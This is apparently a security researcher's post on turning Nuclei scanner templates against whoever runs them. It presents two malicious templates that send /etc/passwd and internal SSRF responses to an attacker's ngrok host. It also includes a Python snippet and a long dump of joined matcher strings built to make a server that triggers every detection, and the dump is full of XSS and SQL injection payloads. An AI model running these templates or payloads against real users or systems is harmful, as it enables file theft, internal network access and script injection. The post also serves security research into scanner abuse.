1632834092
Tired of kiddies messing with your servers? Tired of zillions of requests and tool-generated reports? FEAR NO MORE !
Ok , I'm kinda lazy to write lots of techinical things and be funny, so this post gonna be a dump. The tool is great btw, but is fun to mess with great things I guess.
So @c3l3s14n made a malicious template that explores a RCE on the headless Chrome. Lets make more malicious templates !
id: lfr-poc
info:
name: Local File Read on Nuclei with Exfiltration
author: caioluders
severity: critical
description: You got it
requests:
- method: GET
payloads:
passwd: /etc/passwd
path:
- "https://133713371337.ngrok.io/{{passwd}}"
id: ssrf-poc
info:
name: SSRF on Nuclei with Exfiltration
author: caioluders
severity: critical
description: Makes internal request, dumps response on the attacker's server
requests:
- method: GET
path:
- "http://127.0.0.1:1337/flag"
- "http://133713371337.ngrok.io/{{base64(output)}}"
extractors:
- type: regex
name: output
part: body
internal: true
regex:
- ".*"
Is this a SERVER SIDE, or Client Side? Hacker Side? The question remains...
What if you made a server that responds all the right answers and it's vulnerable to everything?
With a little of python you can extract all the matchers and JOIN THEM !
In [11]: home_dir = os.path.expanduser('~')
...:
...: all_templates = glob.iglob(home_dir+"/nuclei-templates/**/*.yaml",recursive=True)
...: for f in all_templates :
...: yaml_dump = yaml.load(open(f,"r").read())
...: try:
...: print(''.join(yaml_dump["requests"][0]["matchers"][0]["words"]),end="")
...: except :
...: pass
Axis Happiness PageAxis2 Happiness PageExamining Application ServerExamining Version
ServiceExamining System Propertiessecret_key_base =config.secret_token
=realmresourceauth-server-url[build-system][tool.poetry]"version":"file":"sources":ionCube
Loader Wizard# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile
v1asserthighlightopcachemssqloci8agentIndex of /libraries/joomla/databaseParent Directory# Snyk
(https://snyk.io) policy file, patches or ignores known vulnerabilities._links/alps/profileThis
file is auto-generated from the current state of the database.ActiveRecord::Schema.defineWeb
Server ConfigurationMappingMappings<FileZilla<Servers><title>Choose language |
Drupal</title>@GLPI_LDAP
server"uuid":"glpi":PuTTY-User-Key-FileEncryption:namedescriptionmainGeneral SettingsDatabase
SettingsICEFLOW VPN:ICEFLOW SYSTEMICEFLOWIndex
ofoauth-private.keyoauth-private.keyMapping=SourceTimeStamp=<phpunit</phpunit>InvalidArgumentExceptionlocal.ERRORErrorExceptionsyntax
errorSegmentation Faultcoredumpscript headersBroken pipeArray<title>Pyramid Debug
Toolbar</title>Pyramid DebugToolbar</a><debug><struts.actionMapping>Connecting to database
specified by database.ymlStarted GETLANGArraySeamDebugPageorg.jboss.seamlucee.runtimeinfo it
worked if it ends with okIMAP Error:Rails.root:Action Controller: Exception caught"GET
/Connecting to database specified by database.ymlStarted GETError Log for<title>ZM - System
Log</title>gateway_request_totallogback_events_total<title>Telescope</title>RequestsCommandsSchedule<title>Struts
Problem Report</title><td><h1>Application Trace</h1></td>Squid User Access ReportSquid User's
Access
ReportDESCRIPTION=USER="email":"auth":data-shoppable-auth-tokenAWSEBDockerrunVersioncontainerDefinitionsPHP
ExtensionPHP VersionPHP VersionPHP
Extension[default]access_key<th>opcache_enabled</th><th>opcache_hit_rate</th>DeviceSubClassIPAddress[core]FTPSyncoverwrite_newer_preventiondefault_folder_permissionsProFTPDServerNameIndex
of /.vscodecpu_seconds_total<title>Apache2::StatusPerl
versionssh-dssssh-ed25519ssh-rsaecdsa-sha2-nistp256:{SHA}:$apr1$:$2y$ssh-dssssh-ed25519ssh-rsaecdsa-sha2-nistp256Index
ofowncloud/config<configuration><system.webServer>[core][defaults][inventory]This file controls
the configuration of the svnserve daemonAWSTATS CONFIGUREMAIN SETUP SECTIONBinary file
regexps"appName":"X Prober"<title>X ProberLoadModule#
LoadModuledsn:username:password:UserName=Password=file_permissionsextra_list_connectionsapiVersion:resources:namespace:commonLabels:KustomizationPhalcon
FrameworkAnythingHereControllerAuthentication Web Servicehtml>"data":"status":1adminCurrent
Network StatusDo not remove this lineconfiguration filesambahttps://@github.comFPM
ConfigurationPool DefinitionsHostHostNameIdentityFile<title>Symfony
Profiler</title>symfony/profiler/text/htmlparent_locationpush_location[core][api][paths]defaultwebmaster
level 2 username guest password guestBitKeeper configurationloggingemaildescriptionIndex of
/configsParent
Directoryclient_idauth_uritoken_uri$_SERVER['SERVER_NAME']$_ENV['APP_SECRET']$_ENV['SYMFONY_DOTENV_VARS']JoomlaJConfig@packageNetwork
Configurationversion:os:files:<object name="cm_md_db">containerDefinitions<string
name="User">coremail</string><string
name="EnableCoremailSmtp">LTYPELNAMEKEYapplication/jsonBEGIN OPENSSH PRIVATE KEYBEGIN PRIVATE
KEYBEGIN RSA PRIVATE KEYBEGIN DSA PRIVATE KEYBEGIN EC PRIVATE KEYBEGIN PGP PRIVATE KEY
BLOCK<user
name=password=kind:name:steps:nameversionresources.db.params.passwordresources.db.params.usernameadapter:database:production:<title>Saia
PCD Web
Server</title>password=<PUSR_LIST>text/plainapiKey:authDomain:databaseURL:storageBucket:GetListResponseGetList<title>Welcome
to your Strapi app</title>wsdl:definitionsapplication/openapi+jsonThis is simplified WADL with
user and core resources
onlyhttp://jersey.java.nethttp://wadl.dev.java.net/2009/02swagger:Swagger 2.0"swagger":Swagger
UI**token**:Roundcube Webmail initial database structureDB_NAMEDB-
Adminer</title>partial(verifyVersion,
uid=gid=groups=<module><name><displayName><is_configurable></module>vCenter
Server</script><script>alert(document.domain)</script>debuglogIndex
of</script><script>alert(document.domain)</script>sqli-testattribute_countsprice_rangetermIndex
of /.pemupdraftplus</script><script>alert(document.domain)</script>Below you should enter your
database connection details.httpWordPress - Web publishing softwareIndex of
/wp-content/uploads/pdf-invoicesParent
Directory.pdf</script><script>alert(document.domain)</script>Call to undefined function
_deprecated_file()XML-RPC server accepts POST requests
only.DB_NAMEWPENGINE_ACCOUNT</script><script>alert(document.domain)</script>Index of
/wp-content/plugins/super-forms/[{"<img src=x
onerror=alert(document.domain)>":""}]facebooktwitterIndex of
/wp-content/uploads/database-backups.sqladmin:Index of/wp-content/plugins/lifterlms/Index
ofwp-content/plugins/iwp-client/Index of /.pubwpmudevNessusFileIncludeTestIndex
ofwp-content/plugins/email-subscribersDB_NAMEDB_PASSWORDDB_HOSTThe base configurations of the
WordPress<script>alert(document.domain)</script>Index ofExample Domainprotocol_versionIndex
ofwp-content/plugins/easy-media-gallery-pro/</script><img src onerror=alert(/XSS-form/)>Index
ofwp-content/plugins/sfwd-lms</script><script>alert(document.domain)</script>Index
of/wp-content/plugins/elementor/<script>alert(1)</script>octet-streamtext/plainwordpress_logged_inRegister
For This SiteE-mailIndex of/wp-content/plugins/ultimate-member/Your use of this script is at
your sole riskWordPress AdministratorUpdate OptionsIndex of/wp-content/plugins/gtranslate/<body
onload=alert(1)>application/jsonapplication/zip</script><script>alert(document.domain)</script>Location:
www.pluginvulnerabilities.comIndex of/wp-content/plugins/redirection/<title>WordPress ›
Installation</title>Site Title[core]Index of /.sql">Nuclei - Open source project
(github.com/projectdiscovery/nuclei)PHP VersionConfiguration CommandDB_NAMEDB_PASSWORDIndex
of/wp-content/plugins/1-flash-galleryIndex
ofwp-content/plugins/idx-broker-platinum/</script><script>alert(document.domain)</script>DB_NAMEDB_PASSWORDIndex
of/wp-content/plugins/bbpress/Referral could not be retrievedAffiliate
CSV'>"<svg/onload=confirm('test')>Index ofwp-content/plugins/arforms/Index of
/.txtwpdm-cacheIndex ofwp-content/themes/altairwordpress_logged_inIndex
of/123contactform-for-wordpress</script><script>alert(document.domain)</script><title>WordPressIndex
of/wp-content/plugins/woocommerce/javascript:alert(1)stacktrace":"java.io.IOException: No such
file or directoryhttpPHP ExtensionPHP VersionPHP LicensePHP VariableshttpXPATH syntax error:
'\ZSL1ZSL'alert(document.domain)//&et=ServerErrormail/bootr.ashxint(54289)struts-default.xmllast_build_numberbuild_name<web-app</web-app>[Edition][LocalInfo]bit
app
supportfontsextensionsClientncwslogin.jspadmin.jspc5b3d7397a90f42d222f7ed9408c0dc6Content-Type:
text/htmlhttp1788906filename="config.text"Content-Type: application/octet-streamCouchDB/Erlang
OTP/https://{{randstr}}.tld/__session_start__/openvpn_sess$_GET['css']User {{randstr}}
successfully added to DatabaseLAGOS PARKERLogin Successfullylocation.href =
'index.php';onmousewheel=\"return
bbimg(this)\"<rootManagerName><rootManagerPassword>attachmentapplication/x-msdownload38ee63071a04dc5e04ed22624c38e648agenda_js.php?type=xss"
onmouseover=alert(document.domain)/upload_tmp_dir/Kafdrop<img src=x onerror=alert(2)>Server:
viewLinc/5.1.2.367Set-Cookie: crlfinjection=crlfinjection<img src=c
onerror=alert(8675309)><usrID><sessionID>taskResponseThe source URL is not
validdnse0ec043b3f9e198ec09041687e4d4e8d</script><script>alert(document.domain)</script>http"url":"http:"success":1<?xml
version="1.0"?><x:script
xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>httpcon_db_passcon_db_namegke-remotephpinfoPHP
Version52c69e3a57331081823331c4e69d3f2ehttp"><script>alert(document.domain)</script>Location:
https://evil.comjava.lang.NullPointerException:nullMicrosoft Windows
[Version"><script>alert(document.domain)</script>/Success.htm"cf_main_cf"
src="javascript:alert(1)"application-idmaximum-resource-capability"value":"disable":falsetexttext/html"state":"SUCCESS"扫描后门反弹端口文件管理Cod::respond()<title>Insert
Image</title><title>Image
Gallery</title>"name":"length":"filePath":"list":e807f1fcf82d132f9bb018ca6738a19f</iframe><svg/onload=alert("{{randstr}}")>{{randstr}}<form
action="javascript:alert/tmp/www/<script>alert(document.domain)</script>jaxbDirectoryContentsuser-pickersignup.validation.errorsprojectsstartAtmaxResultsselfdescriptionnamedashboardsstartAtmaxResultskeylinklabelselfselfdescriptionnameAdminer'>"<svg/onload=confirm('q')>'>"<svg/onload=confirm('s')>'>"<svg/onload=confirm('search')>'>"<svg/onload=confirm('id')>'>"<svg/onload=confirm('action')>'>"<svg/onload=confirm('keyword')>'>"<svg/onload=confirm('query')>'>"<svg/onload=confirm('page')>'>"<svg/onload=confirm('keywords')>'>"<svg/onload=confirm('url')>'>"<svg/onload=confirm('view')>'>"<svg/onload=confirm('cat')>'>"<svg/onload=confirm('name')>'>"<svg/onload=confirm('key')>'>"<svg/onload=confirm('p')>{{randstr}}.tldbit
app supportfontsextensionshttp"><injectable>httpDashboard
[Jenkins]java.lang.StringIndexOutOfBoundsExceptionString index out of range<title>People -
[Jenkins]</title>println(Jenkins.instance.pluginManager.plugins)Scriptconsole</script><script>alert(document.domain)</script><svg/onload=alert('{{randstr}}')>application/jsonPHP
ExtensionPHP VersionPHP ExtensionPHP VersionPHP ExtensionPHP VersionSQLSTATEXPATH syntax
[email protected](This files describes API changes in
core libraries and APIs,information provided here is intended especially for developers.new my
moodle and profiles APIapplinksappIDpaths# @package JoomlaOpen Source Matters. All rights
reservedarn:aws:ecsDisallow:RewriteRule</IfModule><IfModuleYou want to configure phpMyAdmin
using web interface<access-policy><cross-domain-access>domain
uri=.xsdSchemasinterest-cohort=()TRACE / HTTP2021Directory listing forIndex of /[To Parent
Directory]Directory: /<title>Polycom Login</title><title>Weave
Scope</title>__WEAVEWORKS_CSRF_TOKEN__CSRF_TOKEN_PLACEHOLDER__Epson
Connect/IMAGE/EPSONLOGO.PNG<title>Synnefo Admin</title>Powered by
GoAnywhereGoAnywhere.com<title>Apache Flink Web Dashboard</title><title>H2 Console</title>Epson
Web ControlBasic ControlAdvanced<!--for router status
S-->{"code":200,"progress":null,"status":"ready"}<title>Installation</title>WebLaunch/auth/realms/apimanWorkspaceLoginAirWatch<title>Grafana</title>LoginBrowseWelcome
Guest<title>SSL VPN Service</title>Self-Service
ConsoleRSAAM_Self_Service_Consoleconsole-selfserviceSaferoads
VMSGitLabhttps://about.gitlab.comGitHub · Enterprise<title>Cerebro</title>NetScaler
AAA</title><title>CrushFTP WebInterface</title><th>System Manager
ID:</th>/sap/hana/xs/formLogin/images/sap.png<title>Sophos</title>hitron$.hitron.languages.lang_init();<title>zabbix-server:
Zabbix</title><title id="page_title">Sign in to Cisco Finesse</title><title>Call Break
CMS</title><title>XenForo</title>/remote/fgt_lang<title>GXD5 Pacs Connexion
utilisateur</title><title>Atlassian Crowd - Login</title><title>Kafka Topics UI - Browse Kafka
Data</title><title>Acunetix</title><acx-root></acx-root><title>WeatherLinkIP
Configuration</title>Project Management Software<title>Citrix Gateway</title><title>Virtual
Office</title><title>CRXDE Lite</title>phpPgAdminbrowser.phpintro.php<a
href="http://www.keycloak.org">keycloak<title>Oracle(R) Integrated Lights Out Manager -
Login</title><title>MinIO Browser</title><title>Minio Browser</title><title>Tuxedo Connected
Controller</title><title>Cortex XSOAR</title><title>Oracle Commerce Business Control
Center</title>Sign in [Jenkins]<title>XenMobile - Console - Logon</title>WordPress</title>Log
In</title>/wp-login.php?action=lostpassword">Lost your password?</a><form name="loginform"
id="loginform" action="{{BaseURL}}/wp-login.php" method="post"><title>Ansible
Tower</title>ansible-main-menuX-Mod-PagespeedWEB Local Craft Terminal<h2>Welcome to the Apache
ActiveMQ!</h2><title>Apache ActiveMQ</title>/dana-na/auth/welcome.cgi<title>GLPI -
Authentication</title>title="Powered by Teclib and contributors" class="copyright">GLPI
Copyright<title>Bazarr</title><title>Vigor Login Page</title>Azkaban Web ClientNginx Proxy
Manager</title><title>RocketMq-console-ng</title>Welcome to iTopiTop loginOne Identity Password
Manager<title>SonicWall - Authentication</title>SonicWall AdministratorAkamai Inc. All rights
reservedAkamai CloudTest<title>ClearPass Policy Manager - Aruba Networks</title><title
ng-bind="$root.title">Keenetic Web</title>ng-app="faradayApp">Nomadnomad-ui<title>User
AuthenticationWatchGuard Technologies<title>Idera Server Backup Manager SE </title><title>Cisco
Integrated Management Controller Login</title>Login - Adminer<title>Honeywell XL Web
Controller</title><title>TOS Loading</title>If this device is not in your possession, please
contact your local network administrator.mikrotik.comJBoss JMX Management Console<title
id="PageTitle">Password Management Client</title>Oki Data Corporation<title>Netscaler
Gateway</title>Telerik.Sitefinity.Web.UI.UserPreferencesAvatier
Corporation<title>phpMyAdminpmahommeCouchDB/Erlang OTP/<title>XVR LOGIN</title><title>Prometheus
Time Series Collection and Processing Server</title><title>AP setup</title><title>Solr
Admin</title><title>Sidekiq</title>ShareCenterPlease Select Your
Account<title>SonarQube</title>No administrator account found inside the database<title>Dell
OpenManage Switch Administrator</title>username="tomcat"
password="s3cret"manager-gui<title>Ambari</title>href="http://www.apache.org/licenses/LICENSE-2.0"hadoopresourcemanagerlogged
in as: dr.who<title>SGP</title>CirCarLife Scada<div
class="navbar-brand">Hadoop</div><title>Radius Manager - User Control
Panel</title><title>Nutanix Web Console</title><li>LabTech</li><form
action="/WCC2/Search/search" id="searchForm method="post"><h1> Welcome to the LabTech Web
Portal</h1>Universal Agent UninstallerTechnician Login<form action="/WCC2/Home/Login"
autocomplete="off" method="post"><title>GlobalProtect Portal</TITLE><msg>Invalid
parameters</msg><title>D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME</title><title>D-LINK
SYSTEMS, INC. | WIRELESS ACCESS POINT | HOME</title>/signon.html<meta HTTP-EQUIV='Refresh'
CONTENT='1Home motion by SomfyWebalizer VersionUsage statistics for<title>Okta - Sign
In</title>fioriLoginaction="/fiori"Kubernetes Dashboard</title><title>FCKeditor<title>CKEditor
Samples</title>http://ckeditor.com</a>Custom Uploader URL:init_spell()'tip':'<title>WHM
Login</title><title>R WebServer</title><title>Sign In-SuperVPN</title><title>seats.io |
login</title>OpenNMS Web Console<title>dotCMS Content Management Platform</title>RabbitMQ
Management<title>Odoo</title><title>Icinga Web 2
Login</title>_ctxstxt_CitrixCopyright<title>GLPI - Аутентификация</title>GLPI
Copyright<title>ColdFusion Administrator Login</title><title>FastAPI - Swagger
UI</title><title>FastAPI - ReDoc</title>{"title":"FastAPI"<title>Pandora FMS mobile</title><meta
name="generator" content="Joomla! - Open Source Content Management"
/>/administrator/templates/isis/images/joomla.pngid_LaCiehudson.model.HudsonSet-Cookie:
CmWebAdminSessionSolarWinds Orion<title>Login - OpenStack Dashboard</title>Apache Tomcat<a
href="/admin/">Django administration</a><title>Selenoid UI</title>/manifest.json<title>Total Web
Solutions</title><meta name=description content="Traefik UI"><title>Splunk SOAR</title>Your
client connectionThis security appliance is directly connected to a local network<title>Project
Fauxton</title>webpackJsonpzipkin-lens<title>WSO2 Management Console</title><title>Login - Lucee
Web Administrator</title><title>Login - Lucee Server Administrator</title><title>Strapi
Admin</title><title>Wowza Streaming Engine Manager</title><!-- graph table begins -->Global
kernel usage</b>Kernel usage per processor</b><!-- graph table ends -->1day.png'<title>VMware
Horizon</title><TITLE>CoDeSys WebVisualization</TITLE>webvisu.jar,minml.jar<title>frps
dashboard</title>Camunda Welcome<title>F-Secure Policy Manager
Server</title><title>SAP NetWeaver Portal</title>MongoDB Ops Manager</title><title>WEB
SERVICE</title><base href="/secadmin/"><title>WebMail login: totemomail®
WebMail</title><title>Sphider Admin Login</title><title>SiteOmat
Login</title>USER_LOGIN/bitrix/js/main/"sessionName":"zentaosid"{"version":"<title>Log in -
Plastic SCM</title>>KafkaMonitor</a>>Kafka Monitor GUI</h1>Plesk
Onyx<title>Logon</title>fioriLoginactive_admin_contentactive_admin-About VMware
AirWatch/CxWebClient/webApp/Scripts/libs/authenticationScriptsAirflow - LoginPowerLogic
ION<title>Blue Iris Login</title>src="/druid.js"href="/druid.css"<title>Server Backup Manager SE
</title><title>Sauter moduWeb - Login</title>Welcome to Zenphoto! This page will set up
ZenphotoExporter/metrics<title>Advanced Setup - Security - Admin User Name &
Password</title>ZTE Corporation. All rights reserved. </div><form name="fLogin" id="fLogin"
method="post" onsubmit="return false;" action=""><title>Parallels HTML5
Client</title><title>OctoPrint Login</title><title>Wyse Management Suite</title>Plesk
Obsidian<title>JFrog</title>Kronos Workforce CentralRStudioMobileIron Admin PortalMobileIron
User PortalMobileIron RegistrationMobilizing enterprise applicationsWelcome to
WildFly<title>Identity Services Engine</title>g_i3gStateg_sysinfo_sim_stateg_iUIDPlease
loginftnt-fortinet-gridmain-fortiweb.css<title>Miniweb Start Page</title><title>CX
Cloud</title><title>Kafka Connect
UI</title>csod-customcsodcommon<title>MantisBT</title>HiveManager Loginhybris Management
Console<title>Login to Webmin</title><title>GetSimple » Installation</title>PHP
Version<title>Symantec Data Loss Prevention</title><TITLE>PGP Global
Directory</TITLE><title>Symantec Endpoint Protection Manager</title><TITLE>Symantec Encryption
Server: Web Email Protection - Login</TITLE><title>ManageEngine Analytics
Plus</title><title>ADSelfService Plus</title><title>ManageEngine ServiceDesk
Plus</title><title>ManageEngine SupportCenter Plus</title><title>APEX IT Help
Desk</title><title>ManageEngine AssetExplorer</title><title>Applications Manager Login
Screen</title><h2>OpManager Plus<span><title>ManageEngine Desktop Central
10</title><title>ManageEngine - ADManager Plus</title><title>IBM iNotes Login</title><title>IBM
Security Access Manager</title><title>AEM Sign In</title><title>Adobe Connect Central
Login</title><title>Component Browser Login</title><title>Adobe Media
Server</title><title>Internet Services</title><TITLE>Network Camera</TITLE>webcams and ip
cameras server for windowsMOBOTIXhttpDevice Informationhp<title>NUUO Network Video Recorder
Login</title><TITLE>LUTRON</TITLE>>DeviceIP</A>>Get Database Info as XML</A>Live view -
AXIS<title>BEMS</title>../http/index.phpBEGIN RSA PRIVATE KEYHP LaserJet ProfessionalBrother
IndustriesNetwork StatusBrother Industries<TITLE>Panasonic Network Camera Management
System</TITLE><title>ePMP</title>SeleaCPSHttpServerselea_httpdHttpServer/0.1MJPG-Streamer/0.2<title>ContaCam</title>But
if you're looking to build your own websiteyou've come to the right place.Ошибка 402. Сервис
Айри.рф не оплаченOops.</h2><p class="text-muted text-tight">The page you're looking for doesn't
exist.This account no longer activeNo Site For Domainthis help center no longer existsNo
settings were found for this company:404 - Page Not FoundStart Your New Landing Page
Now!pagewiz<strong>Trying to access your account?</strong>or <a
href="mailto:[email protected] looks like you may have taken a wrong turn somewhere. Don't
worry...it happens to all of us.Profile not foundHmmm....something is not right.404 - Page Not
FoundOops… looks like you got lostDo you want to register.wordpress.com</em>
doesn’t existIf you need immediate assistance, please contact <a
href="mailto:[email protected]<div class="notfound">404 Not Found<br>Project doesnt exist...
yet!There is no helpdesk here!Maybe this is still fresh!Whatever you were looking for doesn't
currently exist at this address.There's nothing here.We're sorry, you've landed on a page that
is hosted by Flywheel<h1>Oops! That's not the site<br>you're looking for.</h1>Repository
not found<h1>Error 404: Page Not Found</h1>Unrecognized domain <strong>Company Not FoundThere is
no such company. Did you enter the right URL?Not found - Request ID:project not foundAlias not
configured!Admin of this Helprace account needs to set up domain aliasWith GetResponse Landing
Pages, lead generation has never been easierhttps://www.wishpond.com/404?campaign=true404: This
page could not be found.404 Blog is not foundOops - We didn't find your site.If you're moving
your domain away from Cargo you must make this configuration through your registrar's DNS
control panel.We can't find this <a href="https://simplebooklet.comunknown to Read the DocsThe
feed has not been found.<p class="description">The page you are looking for doesn't exist or has
been moved.</p>The specified bucket does not existThere is no portal here ... sending you back
to Aha!ngrok.io not foundTunnel *.ngrok.io not foundThis page is reserved for artistic dogs.<h1
class="headline">Uh oh. That page doesn’t exist.</h1>If this is your website and you've just
created it, try refreshing in a minuteNon-hub domain, The URL you've accessed does not provide a
hub.Sorry, this shop is currently unavailable.To finish setting up your new web address, go to
your domain settings, click "Connect existing
domain"data-html-nameherokucdn.com/error-pages/no-such-app.html<title>No such
app</title>{"text":"Page Not Found"Please go to the site settings and put the domain name in the
Domain tab.Looks like you've traveled too far into cyberspace.offline.ghost.org<h1>Oops! We
couldn’t find that page.</h1>Public Report Not ActivatedThis public report page has not
been activated by the userSorry, this page is no longer available.We could not find what you're
looking for.Domain not founddoes not exist in our systemis not a registered InCloud
YouTrack.Building a brand of your own?to target URL: <a href="https://tictail.comStart selling
on Tictail.There isn't a GitHub Pages site here.For root URLs (like http://example.com/) you
must provide an index.html fileThe gods are wise, but do not know of the site which you seek.Job
Board Is UnavailableThis job board website is either expiredThis job board website is either
expired or its domain name is invalid.<p class="bc-gallery-error-code">Error Code: 404</p>Error
404 - AnnounceKitYou have logged in as 'admin'ZMC - Backup Set ManagementYou should be
redirected automatically to target URL: <a
href="/">/</a>/super/index.html"code":200"msg""content"accessTokenapplication/jsonSet-Cookie:
ECOMSecurity/console/index.jspADMINCONSOLESESSION"Users" :
{AMBARI.grafana_sessiontext/html"username":"showdoc""user_token":/carbon/admin/index.jsp?loginStatus=trueJSESSIONID"session.id""success""success"Set-Cookie:
SUPPORTSESSIONIDdocument.formParent2.changepasswd1.valuepasswd_change.ehpofbiz-pagination-template<span>Powered
by OFBiz</span>session_id=resourceapplication/json<META HTTP-EQUIV=REFRESH
CONTENT="0;URL=/index.htm">urn:schemas-microsoft-com:vml<title>GLPI - Standard
Interface</title>Set-Cookie: adminSet-Cookie:
PHPSESSIDzabbix.php?action=dashboard.viewtext/html"message": "success""username": "admin""type":
"login"application/jsonLocation: /index.php?action=admin.index&host=0Set-Cookie:
ROCK_LANG="username""authToken""guacadmin"Content-Type: application/json/0/ConsoleProperty of
IBM<h1>Welcome to Axis2 Web Admin Module
!!</h1>session=./admin/<title>Redirecting...</title><h1>Redirecting...</h1<a
href="/">spectracomdeletedWelcome to the Apache ActiveMQ Console of
<b><h2>Broker</h2>proxies</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>DB_NAMEDB_PASSWORDDB_HOSTThe
base configurations of the
WordPress<script>alert(1)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script><web-app</web-app>text/html"></script><script>alert(document.domain)</script>httphttphttparray(2)Position:
||whoami||roothttp<img src=x
onerror=alert(document.domain)></script><script>alert(document.domain)</script>Too many
connections<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content
frame">application/x-hessianemail.smtp_host.securedemail.smtp_password.securedemail.smtp_port.securedemail.smtp_username.secured{"type":"success","message":"File
removed successfully"}Admin
Consoletext/html</title><script>alert(31337)</script>"/></script><script>alert(document.domain)</script>Content-Type:
application/jsonartica-applianc[extensions]httpContent-Type: application/jsontotalinternal
server error<div id="adminmenumain" role="navigation" aria-label="Main
menu"><h1>Dashboard</h1>application/xmlhttp"dag_run_url":"dag_id":"items":<script>document.title
= "";alert(document.domain);" -
Jeedom"</script>INTERNAL_PASSWORD_ENABLEDCONF_VIRTUAL_KEYBOARD<h1>sample3.10.4.720583.12.4.765443.8.2.672957.0.2.810057.2.7.869747.4.3.897857.6.4.943917.8.2.978268.0.6.1054088.2.2.1072858.4.3.1116148.6.3.1161758.8.1.1189139.0.3.1246209.2.0.1279409.4.3.1376849.6.7.1459499.8.4.14916619.03.3.15216619.06.4.15711819.09.4.019.12.2.020.03.2.020.06.3.0vbulletinrcetext/html<svg/onload=alert(/{{randstr}}/)>poc-testingnonexistentname=pass=Welcome
to kongconfigurationkong_env<script>alert("XSS")</script>httphttpfaultStringNo such service
[ProjectDiscovery]methodResponsewebvpnWebvpnPHP ExtensionPHP
Versionhttp<svg/onload=alert(document.domain)>:Envelope:Body:getAllAgentInfoResponseUser does
not existfunction(handler){};function
__MobileAppList(test){alert(document.domain);};//</div><img src=x
onerror=alert(123);>catch-breadcrumb<jnlp codebase="nonexistent.1337">Burp Collaborator
Server<script>alert(document.domain)</script><svg/onload=alert(xss)>http<script>alert('xss')</script>searchersgroupsIndex
of /pme/mediaParent
Directorypoc.txtadded</script><script>alert(document.domain)</script>add-category.phpget book
price failed! You have an error in your SQL syntaxCan't retrieve data You have an error in your
SQL
syntaxdns</script><script>alert(document.domain)</script>10.3.6.012.1.3.012.2.1.312.2.1.4http</script><script>alert(document.domain)</script>Location:
https://example.com</script><script>alert(document.domain)</script>SQL STATEMENT:<TD>UPDATE
login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE
UPPER(USERNAME)=UPPER(NULL)or\`1\`=\`1\`;--
-')</TD>CTCWebServiceSiSOAP-ENVSolarWinds.Orion.Core.<svg/onload=alert(1)>DatabaseError
atORA-29257:ORA-06512:Request Method:</script><script>alert(document.domain)</script>var
ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//<li
class='file ext_passwd'><a rel='/passwd'>passwd</a></li>iLO
User</script><script>alert(document.domain)</script>httphttp6dd70f16549456495373a337e6708865[extensions]for
16-bit app supportright">Router\s*Admin\s*Username<right">Router\s*Admin\s*Password<Debugging
informationcom.thoughtworks.xstream.converters.collections.MapConverterX-Hacker: Bounty
Plzapplication/json</script><script>alert(document.domain)</script><script>alert("{{randstr}}")</script>AvantFAXMogwailabs:
CHECKCHECKcf79ae6addba60ad018347359bd144d2<img src=x onerror=alert(document.domain)>Failed to
add new collection48dbd2384cb6b996fa1e2855c7f0567fnoresize
src="/\example.com?configName=Content-Type:
text/htmlClassCastException<script>alert(document.domain)</script><firmwareVersion>http</script><script>alert(document.domain)</script>application/jsonLocation:</script><script>alert(document.domain)</script>@start@Success@[email protected]</script><script>alert(document.domain)</script>/sbin/nologin<input
type="hidden" name="account_update_token"
value="([a-zA-Z0-9_-]+)"rdspassword=encrypted=<script>alert('xss')</script>httpid="sell-media-search-text"
class="sell-media-search-text"alert(1337)"username": "access-admin"><img src=x
onerror=alert(1)>>)1(trela=rorrenoTmVzc3VzQ29kZUV4ZWNUZXN0</script><script>alert(document.domain)</script>http</script><script>alert(document.domain)</script>seriesListroot:*:bin:*:for
16-bit app
supportuid=gid=</script><script>alert(document.domain)</script><svg/onload=alert(xss)></script><script>alert(document.domain)</script>[global]username
has already been usedLocation: /api/users/httpTypes of profiles available:Profile
DescriptionsdeleteKey<a
href="/\google.com/evil.html">";alert('1');//<title>Welcome</title>http~lansweeperdb~</script><script>alert(document.domain)</script>DB_NAMEDB_PASSWORDorg.jivesoftware.database.EmbeddedConnectionProviderMost
properties are stored in the Openfire
database<script>alert(1)</script><svg/onload=alert(1)>phpmyadmin.netphpMyAdminfoo"></script><script>alert(document.domain)</script>"</script><script>alert(document.domain)</script>phpinfoPHP
Version</script><script>alert(document.domain)</script>soapenv:Envelope<span
data-filter-field="owner-full-name"><title>Manage Filters -
Jira</title>4220397236httpnuclei16384the user does not existhttpNameEmailStatusCreated
On</script><script>alert(document.domain)</script>downmix.inc.phpCall to undefined function
helper()</script><script>alert(document.domain)</script>DB_NAMEDB_PASSWORD</script><script>alert(document.domain)</script>Configuration
has been altered</script><script>alert(document.domain)</script>CirCarLife
Scadahttp31333333337"message":"An internal server error occurred"CirCarLife
Scadanuclei-template</script><script>alert(document.domain)</script>var fgt_langThe base
configuration for WordPressdefine( 'DB_NAME',define( 'DB_PASSWORD',PictureInfo/output/CirCarLife
Scadavar valueUser =
"j";-alert(1)-"x";</script><script>alert(document.domain)</script>http</script><script>alert(document.domain)</script>calling
init:
/lib/http</script><script>alert(document.domain)</script>application/json///sessions"date":"message":"trace":[<script>alert(1337)</script><!--</TITLE>Failed
to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389httpCirCarLife
ScadaphpinfoPHP
Version<h1xxx<scriptalert(1)</script<svg/onload=alert(1337)>26ec00a3a03f6bfc5226fd121567bb58Fatal
error: Class 'PHPUnit_Framework_TestCase' not found in
/application/third_party/CIUnit/libraries/CIUnitTestCase.php on lineDB_NAMEDB_PASSWORDDB_HOSTThe
base configurations of the WordPress"><script>alert("1")</script>Unexpected text in
DTDpackage#vulntestroot:/root:/bin/bashContent-Type:
text/csv</script><script>alert(document.domain)</script>for 16-bit app
